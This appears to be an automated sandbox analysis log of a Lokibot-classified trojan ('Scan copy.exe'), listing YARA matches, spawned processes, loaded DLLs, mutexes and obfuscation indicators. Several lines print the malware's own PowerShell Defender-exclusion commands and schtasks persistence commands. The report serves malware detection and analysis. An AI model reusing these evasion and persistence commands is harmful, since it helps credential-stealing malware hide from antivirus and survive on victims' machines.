                Source: Process Memory Space: vLQwEscoQr.exe PID: 8048, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: Scan copy.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: vLQwEscoQr.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: 0.2.Scan copy.exe.6c90000.4.raw.unpack, AgyBZslxuiICoVYBCt.csSecurity API names: _0020.SetAccessControl
                Source: 0.2.Scan copy.exe.6c90000.4.raw.unpack, AgyBZslxuiICoVYBCt.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.Scan copy.exe.6c90000.4.raw.unpack, AgyBZslxuiICoVYBCt.csSecurity API names: _0020.AddAccessRule
                Source: 0.2.Scan copy.exe.3907488.0.raw.unpack, Ch3eTBbNYCrXmN2i0X.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.Scan copy.exe.3907488.0.raw.unpack, AgyBZslxuiICoVYBCt.csSecurity API names: _0020.SetAccessControl
                Source: 0.2.Scan copy.exe.3907488.0.raw.unpack, AgyBZslxuiICoVYBCt.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.Scan copy.exe.3907488.0.raw.unpack, AgyBZslxuiICoVYBCt.csSecurity API names: _0020.AddAccessRule
                Source: 0.2.Scan copy.exe.6c90000.4.raw.unpack, Ch3eTBbNYCrXmN2i0X.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@19/17@0/1
                Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exeCode function: 20_2_0040434D CoInitialize,CoCreateInstance,VariantInit,SysAllocString,VariantInit,VariantInit,SysAllocString,VariantInit,SysFreeString,SysFreeString,CoUninitialize,20_2_0040434D
                Source: C:\Users\user\Desktop\Scan copy.exeFile created: C:\Users\user\AppData\Roaming\vLQwEscoQr.exeJump to behavior
                Source: C:\Users\user\Desktop\Scan copy.exeMutant created: \Sessions\1\BaseNamedObjects\FDD42EE188E931437F4FBE2C
                Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exeMutant created: NULL
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1204:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8004:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7220:120:WilError_03
                Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exeMutant created: \Sessions\1\BaseNamedObjects\kfAGQRAwo
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6392:120:WilError_03
                Source: C:\Users\user\Desktop\Scan copy.exeFile created: C:\Users\user\AppData\Local\Temp\tmp18EC.tmpJump to behavior
                Source: Scan copy.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: Scan copy.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                Source: C:\Users\user\Desktop\Scan copy.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                Source: C:\Users\user\Desktop\Scan copy.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: Scan copy.exeVirustotal: Detection: 32%
                Source: Scan copy.exeReversingLabs: Detection: 23%
                Source: C:\Users\user\Desktop\Scan copy.exeFile read: C:\Users\user\Desktop\Scan copy.exeJump to behavior
                Source: unknownProcess created: C:\Users\user\Desktop\Scan copy.exe "C:\Users\user\Desktop\Scan copy.exe"
                Source: C:\Users\user\Desktop\Scan copy.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Scan copy.exe"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\Scan copy.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\vLQwEscoQr.exe"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\Scan copy.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\vLQwEscoQr" /XML "C:\Users\user\AppData\Local\Temp\tmp18EC.tmp"
                Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\Scan copy.exeProcess created: C:\Users\user\Desktop\Scan copy.exe "C:\Users\user\Desktop\Scan copy.exe"
                Source: unknownProcess created: C:\Users\user\AppData\Roaming\vLQwEscoQr.exe C:\Users\user\AppData\Roaming\vLQwEscoQr.exe
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\vLQwEscoQr" /XML "C:\Users\user\AppData\Local\Temp\tmp2BF7.tmp"
                Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exeProcess created: C:\Users\user\AppData\Roaming\vLQwEscoQr.exe "C:\Users\user\AppData\Roaming\vLQwEscoQr.exe"
                Source: C:\Users\user\Desktop\Scan copy.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Scan copy.exe"Jump to behavior
                Source: C:\Users\user\Desktop\Scan copy.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\vLQwEscoQr.exe"Jump to behavior
                Source: C:\Users\user\Desktop\Scan copy.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\vLQwEscoQr" /XML "C:\Users\user\AppData\Local\Temp\tmp18EC.tmp"Jump to behavior
                Source: C:\Users\user\Desktop\Scan copy.exeProcess created: C:\Users\user\Desktop\Scan copy.exe "C:\Users\user\Desktop\Scan copy.exe"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\vLQwEscoQr" /XML "C:\Users\user\AppData\Local\Temp\tmp2BF7.tmp"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exeProcess created: C:\Users\user\AppData\Roaming\vLQwEscoQr.exe "C:\Users\user\AppData\Roaming\vLQwEscoQr.exe"Jump to behavior
                Source: C:\Users\user\Desktop\Scan copy.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\Desktop\Scan copy.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\Scan copy.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\Scan copy.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\Scan copy.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\Scan copy.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\Scan copy.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\Scan copy.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\Scan copy.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\Scan copy.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Scan copy.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\Scan copy.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\Scan copy.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\Scan copy.exeSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Users\user\Desktop\Scan copy.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\Scan copy.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\Scan copy.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\Scan copy.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Scan copy.exeSection loaded: dwrite.dllJump to behavior
                Source: C:\Users\user\Desktop\Scan copy.exeSection loaded: textshaping.dllJump to behavior
                Source: C:\Users\user\Desktop\Scan copy.exeSection loaded: iconcodecservice.dllJump to behavior
                Source: C:\Users\user\Desktop\Scan copy.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Users\user\Desktop\Scan copy.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Users\user\Desktop\Scan copy.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\Scan copy.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\Scan copy.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\Scan copy.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\Scan copy.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Users\user\Desktop\Scan copy.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\Scan copy.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\Desktop\Scan copy.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Users\user\Desktop\Scan copy.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Users\user\Desktop\Scan copy.exeSection loaded: slc.dllJump to behavior
                Source: C:\Users\user\Desktop\Scan copy.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Users\user\Desktop\Scan copy.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Users\user\Desktop\Scan copy.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Users\user\Desktop\Scan copy.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\Scan copy.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\Scan copy.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\Scan copy.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\Scan copy.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\Scan copy.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\Scan copy.exeSection loaded: vaultcli.dllJump to behavior
                Source: C:\Users\user\Desktop\Scan copy.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\Desktop\Scan copy.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Scan copy.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\Scan copy.exeSection loaded: netapi32.dllJump to behavior
                Source: C:\Users\user\Desktop\Scan copy.exeSection loaded: samcli.dllJump to behavior
                Source: C:\Users\user\Desktop\Scan copy.exeSection loaded: samlib.dllJump to behavior
                Source: C:\Users\user\Desktop\Scan copy.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\Scan copy.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Scan copy.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\Scan copy.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Scan copy.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Scan copy.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exeSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exeSection loaded: dwrite.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exeSection loaded: textshaping.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exeSection loaded: iconcodecservice.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exeSection loaded: slc.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dll
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exeSection loaded: cryptsp.dll
                Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exeSection loaded: rsaenh.dll
                Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exeSection loaded: cryptbase.dll
                Source: C:\Users\user\Desktop\Scan copy.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Users\user\Desktop\Scan copy.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                Source: C:\Users\user\Desktop\Scan copy.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\OutlookJump to behavior
                Source: Scan copy.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: Scan copy.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                Data Obfuscation

                barindex
                Source: 0.2.Scan copy.exe.51b0000.3.raw.unpack, kAOj1Y7pfP90kycNNw.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                Source: 0.2.Scan copy.exe.3907488.0.raw.unpack, AgyBZslxuiICoVYBCt.cs.Net Code: tx5H7ymxLV System.Reflection.Assembly.Load(byte[])
                Source: 0.2.Scan copy.exe.6c90000.4.raw.unpack, AgyBZslxuiICoVYBCt.cs.Net Code: tx5H7ymxLV System.Reflection.Assembly.Load(byte[])
                Source: 0.2.Scan copy.exe.51b0000.3.raw.unpack, GtaAIbrHXObmMm8GPA.cs.Net Code: vaH8QmOOp System.Reflection.Assembly.Load(byte[])
                Source: Yara matchFile source: 13.2.vLQwEscoQr.exe.41ec8d8.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Scan copy.exe.38ea318.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Scan copy.exe.3787008.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Scan copy.exe.38ea318.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 13.2.vLQwEscoQr.exe.41ec8d8.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 20.2.vLQwEscoQr.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Scan copy.exe.3787008.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 20.2.vLQwEscoQr.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000D.00000002.1349197603.00000000041EC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000014.00000002.1320268746.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1291320333.000000000277C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
